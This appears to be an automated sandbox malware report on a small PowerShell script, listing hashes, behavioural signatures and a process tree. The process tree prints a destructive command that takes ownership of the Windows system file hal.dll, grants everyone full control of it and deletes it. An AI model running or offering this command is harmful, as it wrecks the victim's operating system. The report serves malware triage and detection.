Analysis
-
max time kernel
16s -
max time network
18s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
15/07/2024, 14:54
Static task
static1
Behavioral task
behavioral1
Sample
trigger.ps1
Resource
win7-20240708-en
6 signatures
150 seconds
General
-
Target
trigger.ps1
-
Size
142B
-
MD5
3981277c3f6d65f3351a8709ae9b1a6d
-
SHA1
35f1475f69a389a1a2480f3ecef78a7a46c93083
-
SHA256
4dd70bda2372eb7a20baca37320e246c2e6baf3ad622c558df3e70cb91bed8b2
-
SHA512
a5babc6cda3817f7f74b40568672dd2fb25284bcd493d4bcbd25c621e9ffc71897f239b968fed0c5f526c2e40bc88ef7a62cdc9e7387942cbb172486935d3435
Malware Config
Signatures
-
Possible privilege escalation attempt 2 IoCs
pid Process 2824 icacls.exe 2832 takeown.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 2832 takeown.exe 2824 icacls.exe -
pid Process 1048 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1048 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 1048 powershell.exe Token: SeTakeOwnershipPrivilege 2832 takeown.exe Token: 33 2060 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 2060 AUDIODG.EXE Token: 33 2060 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 2060 AUDIODG.EXE -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 1048 wrote to memory of 1728 1048 powershell.exe 30 PID 1048 wrote to memory of 1728 1048 powershell.exe 30 PID 1048 wrote to memory of 1728 1048 powershell.exe 30 PID 1728 wrote to memory of 2832 1728 cmd.exe 31 PID 1728 wrote to memory of 2832 1728 cmd.exe 31 PID 1728 wrote to memory of 2832 1728 cmd.exe 31 PID 1728 wrote to memory of 2824 1728 cmd.exe 32 PID 1728 wrote to memory of 2824 1728 cmd.exe 32 PID 1728 wrote to memory of 2824 1728 cmd.exe 32
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\trigger.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1048 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\hal.dll && icacls C:\Windows\System32\hal.dll /grant Everyone:(F) && del/f C:\Windows\System32\hal.dll"2⤵
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\hal.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2832
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\hal.dll /grant Everyone:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2824
-
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:2492
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x56c1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2060